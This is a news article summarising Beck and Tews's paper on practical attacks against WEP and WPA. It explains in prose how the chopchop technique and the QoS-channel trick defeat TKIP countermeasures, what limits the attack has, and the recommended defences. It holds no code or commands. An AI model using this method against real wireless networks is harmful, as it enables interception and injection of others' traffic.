Security experts reveal details of WPA hack
In their paper, Practical attacks against WEP and WPA, Martin Beck and Erik Tews have published details about their attacks on WPA secured networks. The attack is essentially a variant of the chopchop attack used against WEP secured networks, which surfaced in early 2005. The name "chopchop attack" is a nod to the KoreK-developed chopchop tool, which allows the user to decrypt an arbitrary encrypted data packet without having to know the WEP key.
The program slices off the last byte of a WEP packet. Under the assumption that the final byte was the zero byte, it attempts to reconstruct a valid checksum with an XOR link from the last four bytes to a specific value. Then it sends the packet to an access point and observes whether it is accepted. If not, it assumes that the sliced off byte was a 1 – in the worst case it continues this process all the way to 256. This process is then repeated for every other byte in the packet. Once finished, the attacker has the packet in plain text.
While the temporal key integrity protocol (TKIP) usually used under WPA also uses the RC4 algorithm, it also implements a number of security measures, including anti-chopchop functions. The wireless connection is dropped if within 60 seconds if more than two packets with an invalid message integrity check (MIC) are received from a client. Furthermore, the TKIP Sequence Counter (TSC) makes it difficult to replay captured packets, which makes chopchop and other replay attacks significantly more difficult. If the TSC of the received packet is lower than the current counter, it is simply thrown out.
According to Beck and Tews, these limitations are relatively easy to get around by simply adhering to the 60 second timeframe and making use of the quality of service functions of the WPA access points. The QoS functions support 8 channels, allowing the attacker simply to execute chopped packets on a different channel than the channel on which they were received, in order to trick the TKIP counter. Generally, traffic is sent over channel 0, while the TSC on the other channels is rarely increased and the TSC of the replayed packet is always greater than the TSC of the received packet.
If this type of WPA attack is used against an encrypted ARP packet with a plain text structure that is always the same for the most part, the attacker merely has to figure out the IP addresses, the MIC, and the WEP-era integrity check value (ICV). Chopchop cracks the MIC and ICV, a total of 12 bytes, while the attacker has to come up with the IP addresses on his own. According to Beck and Tews, once the whole packet is in plain text, and with a bit of knowledge about MIC, the attacker can determine the keystream for communication between the access point and the client without knowledge of the original key. Finally, further packets from the AP to the client can be decrypted with relatively little effort. With the keystream the attacker can encrypt his own packets and send them to a client, in order to divert additional traffic using falsified ARP or ICMP packets.
This type of WPA attack is significantly limited. A successful attack requires a relatively long time to generate a new TKIP key (rekeying) – Beck and Tews presume 3600 seconds. Also, the wireless multimedia extension (WMM) has to be activated so that several QoS channels are available. Once a packet is decrypted (assuming that traffic only uses channel 0), the attacker can only send one packet apiece over channels 1 to 7. Ultimately the TSC of the attacker's packets will be lower than that of the channels.
Furthermore, the attack only works in one direction – from the access point to the client. The AP cannot be attacked with this method. Also, this currently only works with ARP packets, in order to get access to the keystream within 12 to 15 minutes. These limitations may make the WPA attack appear far less spectacular than WEP attacks in their time. Still, this is a beginning and the approach shows that WPA can be cracked in ways other brute force. The security threat posed to WPA secured networks depends on the application. It is possible that this method can already be used to attack corporate networks. Home users' wireless networks are probably not threatened yet, since this type of attack hardly allows covert surfing.
In their study, Tews and Beck suggest reducing the TKIP rekeying time to 120 seconds or less in order to defend against this type of attack. The packet can only be partially calculated in this period. The authors believe that it would be even better to use the CCMP AES encryption method if the access point supports it. The CCMP algorithm is currently considered secure.
- Practical attacks against WEP and WPA, Report by Martin Beck and Erik Tews